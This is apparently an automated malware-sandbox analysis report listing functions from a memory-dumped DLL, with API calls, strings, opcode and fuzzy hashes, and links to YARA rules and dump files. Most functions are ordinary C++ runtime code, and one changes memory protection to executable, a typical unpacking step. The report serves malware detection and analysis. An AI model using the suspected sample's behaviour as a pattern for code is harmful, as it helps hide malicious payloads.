Opcode ID: cbacb16295887515dba291691c58b817e525f46cb4aadf95e2d800a8ced1445a
Instruction ID: 1e2797d6dbd80bd2eac1d0e440e52822f1eeb63d8aaf8b2f30b32cf3bd89e7fa
Opcode Fuzzy Hash: cbacb16295887515dba291691c58b817e525f46cb4aadf95e2d800a8ced1445a
Instruction Fuzzy Hash: F6110275908129DBCF00FBA4C840AFEB7B4AF49318F268508F515AB291DF709E05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA1A5, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDA1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA1B6
int.LIBCPMT ref: 6DDDA1CD

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDA207
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA227
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA245

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: bbfca9743c0a2672a91b88f395f22a57452b5ea87e5c089d07e7577f179f708a
Instruction ID: d20c4c3fcb32443f0da8f334c695ee292152dde405567de4e1a24862c68d328c
Opcode Fuzzy Hash: bbfca9743c0a2672a91b88f395f22a57452b5ea87e5c089d07e7577f179f708a
Instruction Fuzzy Hash: DA11E071848119CBCF01FBA0C840EBDB7B4AF54318F26400AF510AB290DF759A06CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF2CF, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDF2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF2E0
int.LIBCPMT ref: 6DDDF2F7

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF331
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF351
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF36F

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 072af5c3c29f83224dfc70985023c8a046abb7bb148cb7f95e54e24278491b5b
Instruction ID: 2582b827fb31a06d978925739d8e6b20ea7e4e04988f768394c6b344137240d6
Opcode Fuzzy Hash: 072af5c3c29f83224dfc70985023c8a046abb7bb148cb7f95e54e24278491b5b
Instruction Fuzzy Hash: 6F11A075809119DBCF05FB64C840BFDB779AF44718F27404AF521AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA24B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDA252
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA25C
int.LIBCPMT ref: 6DDDA273

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDA2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA2EB

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 46cf0773ece5b0fdf9785b8794a7cc683e4bc8ff5b2d045e961f59a78b9c28bb
Instruction ID: 2e8b8a1644f6a7346e004dd939cb3335e4989a52648d1522a664b758dcc9fc4d
Opcode Fuzzy Hash: 46cf0773ece5b0fdf9785b8794a7cc683e4bc8ff5b2d045e961f59a78b9c28bb
Instruction Fuzzy Hash: 5611E071948229DBCF01FBA4C840EFDB7B5AF64318F264409F611AB290DF719902CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD46AB, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDD46B2
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD46BC
int.LIBCPMT ref: 6DDD46D3

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD4723
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD4741

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 7794da0f72db8eb318aa646789d370bc061310b6ef775a728d4e9da710e98fde
Instruction ID: 60ed59bd32c71875bf7277be5b423a5c9132c9ae16d708880f0145ecee709eea
Opcode Fuzzy Hash: 7794da0f72db8eb318aa646789d370bc061310b6ef775a728d4e9da710e98fde
Instruction Fuzzy Hash: EB11C27590412ADBCF00FBA0C850AFE77B4AF08318F264108F611AB290DF709E0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D5FF, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
_free.LIBCMT ref: 6DE1D636
_free.LIBCMT ref: 6DE1D65E
SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D66B
SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
_abort.LIBCMT ref: 6DE1D67D

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 3924d18fb04c5841ecfc51ba18ac1a6f0bd4b762e7173c82dd38d399b61720f2
Instruction ID: a3555f6b7c3bd3943ec992a3db83dc369120bb6295ce60a4f7a9e49f76c3e538
Opcode Fuzzy Hash: 3924d18fb04c5841ecfc51ba18ac1a6f0bd4b762e7173c82dd38d399b61720f2
Instruction Fuzzy Hash: 38F0287E78D50166CB1216355C09FBB32769BD367DF73012AF62CE6280EF20C80280A8

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD75E8, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6DDD75F4

Part of subcall function 6DDD73A9: std::exception::exception.LIBCONCRT ref: 6DDD73B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7602

Part of subcall function 6DDF3D74: RaiseException.KERNEL32(?,?,6DDD75E7,00000000,?,?,?,?,?,?,?,6DDD75E7,00000000,6DE914C0,?), ref: 6DDF3DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6DDD7614

Part of subcall function 6DDD73E3: std::exception::exception.LIBCONCRT ref: 6DDD73F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7622
std::regex_error::regex_error.LIBCPMT ref: 6DDD7634

Part of subcall function 6DDD7426: std::exception::exception.LIBCONCRT ref: 6DDD743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7642

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: 808337c68e454dd762c8a010d37580d7b328b85ac5a11acac2aab8323fdf0fc0
Instruction ID: 5830b275e5be0f6f6f6c38efdfd728fc0ad17f139a1efe92d1193c0f7581701e
Opcode Fuzzy Hash: 808337c68e454dd762c8a010d37580d7b328b85ac5a11acac2aab8323fdf0fc0
Instruction Fuzzy Hash: D0F0FE35C0420C77CF05FBE4EC45CEDB77DAA14104F524560BB2596451EB71A61A87E2

Uniqueness

Uniqueness Score: -1.00%

Function 6DDCF218, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(6DE986A0,0000305A,00000040,6DE9869C,?,00000000,EEE690D4,008BDA59,?), ref: 6DDCF2D5

Strings

DZm, xrefs: 6DDCF498
Ym, xrefs: 6DDCF385
DZm, xrefs: 6DDCF27D
Ym, xrefs: 6DDCF239

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID: DZm$DZm$Ym$Ym
API String ID: 544645111-1304207040
Opcode ID: e55ca055b39c89c320b6f8a6ab127823e00706b1ae648e1324e1a181f546f07d
Instruction ID: 1b7783ae907c16e810d5b0b03dee3187065b4f68668622b1d7abdac7a2d2ec32
Opcode Fuzzy Hash: e55ca055b39c89c320b6f8a6ab127823e00706b1ae648e1324e1a181f546f07d
Instruction Fuzzy Hash: 5481AAB2A032619FDB05DF79C8817B9BBF8BB46316B20812BF455DF281E3789540CB21

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD53EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6DDD53F5
__Getcvt.LIBCPMT ref: 6DDD540B
__Getcvt.LIBCPMT ref: 6DDD5445

Strings

false, xrefs: 6DDD5466
true, xrefs: 6DDD547B

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: 536b3019053b5f5adcaab39d73661af2c2c22c1cb4e5d5bfce782a8dc53b810b
Instruction ID: 6f7cbad37c8a53a6a0cf1397e2e5522250a6e5f7412f30422e2833d0ba6b33b5
Opcode Fuzzy Hash: 536b3019053b5f5adcaab39d73661af2c2c22c1cb4e5d5bfce782a8dc53b810b
Instruction Fuzzy Hash: 262162B5D05218EBDF01EFA0D884AEE7B78FF05314F15416AF9059F201EB709955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6DE196A5,?,?,6DE19645,?,6DE92D28,0000000C,6DE1978A), ref: 6DE1972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6DE19742
FreeLibrary.KERNEL32(00000000,?,?,?,6DE196A5,?,?,6DE19645,?,6DE92D28,0000000C,6DE1978A), ref: 6DE19765

Strings

mscoree.dll, xrefs: 6DE19728
CorExitProcess, xrefs: 6DE1973A

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9b5ae4f79b1306c304e3dd0250e172413c44d195a8156c8908c4d07981042781
Instruction ID: 959a63613e06fc622d8bc7210047ab330ff9f2cb97203f539522cedd1f8a7f7f
Opcode Fuzzy Hash: 9b5ae4f79b1306c304e3dd0250e172413c44d195a8156c8908c4d07981042781
Instruction Fuzzy Hash: 99F08C70A45108ABEF11AF90CC48FBEBFB8EF05206F124169E905A2240CF308A80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE24E2A, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fbbf136d7f30c389d9af5a20052a603cbfcdbacc2f7bc2534cc154bfbfb86e8
Instruction ID: 14e5a91f94c5b246a43f3be70853349de686870a8f94da74297465997212d272
Opcode Fuzzy Hash: 0fbbf136d7f30c389d9af5a20052a603cbfcdbacc2f7bc2534cc154bfbfb86e8
Instruction Fuzzy Hash: A57170319042179BDB118B59CD84EBEBB75FF56324F34422AE9207B288DF718945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1A737, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6DE1A7A9
_free.LIBCMT ref: 6DE1A7C9

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a074a44c66b17afc6c4d33033072391ebc092e8c24070dc7851116978218d5c3
Instruction ID: f9948bb4f53495da3d51da23fef36c75a6211a7a4eab3bd6f5a21648fa140d99
Opcode Fuzzy Hash: a074a44c66b17afc6c4d33033072391ebc092e8c24070dc7851116978218d5c3
Instruction Fuzzy Hash: B841D372F883049FCB10CF78C880A6DB3B5EF85718B268169D515EB341DB31E906CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D683, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(6DDD75D9,6DDD75D9,00000002,6DE12286,6DE1F2B0,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004), ref: 6DE1D688
_free.LIBCMT ref: 6DE1D6BD
_free.LIBCMT ref: 6DE1D6E4
SetLastError.KERNEL32(00000000,?,6DDD75D9), ref: 6DE1D6F1
SetLastError.KERNEL32(00000000,?,6DDD75D9), ref: 6DE1D6FA

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3f3c738ad13243b043e283431df6980965b4cc6138bc87ed4791f40d10a48a7d
Instruction ID: 6d0c336296668fd6d46426aa1a31bdbf9366203fc09114c24cd40b4279ae24e4
Opcode Fuzzy Hash: 3f3c738ad13243b043e283431df6980965b4cc6138bc87ed4791f40d10a48a7d
Instruction Fuzzy Hash: 9401A97E38D90227C70256355C89FBB3779ABD367DB72012AF518E6241EF74C8064168

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2CCC3, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6DE2CCDB

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2CCED
_free.LIBCMT ref: 6DE2CCFF
_free.LIBCMT ref: 6DE2CD11
_free.LIBCMT ref: 6DE2CD23

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 254188fbf3d2b37c54262ccfbb85913313a02e98c73309f714a71d4b326f34fb
Instruction ID: 4ae0d2411ec80398bc369d2cd4c0d3d51c71714858a09412778a6c4f65e82bf4
Opcode Fuzzy Hash: 254188fbf3d2b37c54262ccfbb85913313a02e98c73309f714a71d4b326f34fb
Instruction Fuzzy Hash: BEF04F3170A20597CB10CA59E8C1D7B77FAAB0571C7714C0AE028EBA01CF30F8908AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6DDD426E
_wcslen.LIBCMT ref: 6DDD4281

Strings

`km, xrefs: 6DDD42C8
For, xrefs: 6DDD4273, 6DDD4349

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`km
API String ID: 1260878687-3792942803
Opcode ID: 6731981707bbff6b063b313cdc422f51640cdf02ea738d32eb719e46f9161612
Instruction ID: 805db1fb6d86b2328a830b479fcb17d80f09f27435e626f7e2a550b16db03027
Opcode Fuzzy Hash: 6731981707bbff6b063b313cdc422f51640cdf02ea738d32eb719e46f9161612
Instruction Fuzzy Hash: 6341BE7964521DCFCF54EB9CCA909AC77F1BB4D728B21824AF5509B396EB30A841CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE28AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6DE28B1F
_free.LIBCMT ref: 6DE28B75

Part of subcall function 6DE28951: _free.LIBCMT ref: 6DE289A9
Part of subcall function 6DE28951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
Part of subcall function 6DE28951: WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
Part of subcall function 6DE28951: WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60

Strings

0!m, xrefs: 6DE28AD8

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!m
API String ID: 314583886-1802470889
Opcode ID: e4ff3df8a32f08d4dc314be69071f3970b38031d8fc61d4622ad56b655f1a78d
Instruction ID: 382091a1cc9b4e2e4ce92b309c3f226dc709ba75f3698e4bb3b12b129e784dad
Opcode Fuzzy Hash: e4ff3df8a32f08d4dc314be69071f3970b38031d8fc61d4622ad56b655f1a78d
Instruction Fuzzy Hash: DD210BB6D0921997DB2196248CC0EEBB778DB4272CF31069ED594F6240DF704D8186E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDB1F4E

Strings

ios_base::failbit set, xrefs: 6DDB1F16
ios_base::badbit set, xrefs: 6DDB1F0C, 6DDB1F31
ios_base::eofbit set, xrefs: 6DDB1F1B

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 28be81a5fbc4420a2a737ad1c5f20c5d0ae2655bacb914dc591b811f8ad807bd
Instruction ID: f47176a715c18097dab74ff1d28cf661148141fc4ab29d83113596346a1ba24b
Opcode Fuzzy Hash: 28be81a5fbc4420a2a737ad1c5f20c5d0ae2655bacb914dc591b811f8ad807bd
Instruction Fuzzy Hash: 8EF0CDF3D042157ADB00EB58DD42FE977A85B0831CF34C459FA52AB182EB75E905C761

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDD4084
_strlen.LIBCMT ref: 6DDD40AF
_strlen.LIBCMT ref: 6DDD40C6

Strings

[json.exception., xrefs: 6DDD409F, 6DDD40A7, 6DDD40C5, 6DDD40CD

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: 811154aa190d6de0da167e3f7c72dcbb42ff5c8b974c85a49ebb13a1aed2c688
Instruction ID: 76bcc342f288f5b8216a3a33b462f39746761a4f17685ecad2a563f658d71656
Opcode Fuzzy Hash: 811154aa190d6de0da167e3f7c72dcbb42ff5c8b974c85a49ebb13a1aed2c688
Instruction Fuzzy Hash: 37F01DB0608205AFDB44AF78D84067EB6A9FF84248F66051DA519DB241DFB4594187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1F345, Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6DE1F3D0
__alldvrm.LIBCMT ref: 6DE1F5D1
__alldvrm.LIBCMT ref: 6DE1F5F3

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
